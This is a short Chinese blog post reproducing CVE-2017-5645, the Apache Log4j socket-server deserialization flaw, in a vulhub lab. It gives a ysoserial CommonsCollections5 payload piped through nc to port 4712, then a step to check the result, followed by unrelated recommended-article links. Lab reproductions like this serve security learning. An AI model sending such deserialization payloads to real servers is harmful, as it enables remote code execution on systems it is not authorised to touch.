vulhub中Apache Log4j Server 反序列化命令执行漏洞复现(CVE-2017-5645)

余生有个小酒馆2024-02-20 12:59

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

1.我们使用ysoserial生成payload,然后直接发送给`your-ip:4712`端口即可。

复制代码 
java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712

工具地址 https://github.com/frohoff/ysoserial

需要注意JDK版本的问题 https://github.com/frohoff/ysoserial/issues/203

2.然后执行`docker compose exec log4j bash`进入容器,可见 /tmp/success 已成功创建:

相关推荐
捏塔20 小时前
完美自动生成单元测试SKILL
单元测试·log4j
就叫_这个吧1 天前
servlet整合tomcat项目启动报错解决,org.apache.tomcat.util.descriptor.web.WebXml.setVersion
java·servlet·tomcat·apache
云器科技1 天前
Apache Iceberg-cpp:原生性能架构与演进路线
架构·apache
Par@ish1 天前
Ubuntu Apache日志存储周期变更
linux·ubuntu·apache
AI浩1 天前
指令微调与对齐技术:SFT、RLHF、DPO、RLAIF 与 RLVR(分层式精讲)
log4j
有浔则灵2 天前
从零开始构建 AI Agent(一):理解 Eino 的 Component 抽象与流式对话
人工智能·log4j
凤年徐2 天前
保姆级教程:用Cline+DeepSeek打造本地AI编程助手
log4j·ai编程
Full Stack Developme3 天前
Spring Bean 依赖注入
python·spring·log4j
一次旅行3 天前
【数据分析/可视化】Apache Superset企业级BI数据可视化平台实战详解
信息可视化·数据分析·apache
万岳科技系统开发4 天前
互联网医院小程序搭建如何快速上线?完整建设方案解析
小程序·apache
热门推荐
01《置身钉内》原文-可播放阅读02GitHub 镜像站点03【AI】2026 年具身智能模型和世界模型总结04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08AI科技热点日报 | 2026年6月1日09CC-Switch 下载、安装与使用配置指南【2026.5.29】10CC-Switch & Claude 基于 Linux 服务器安装使用指南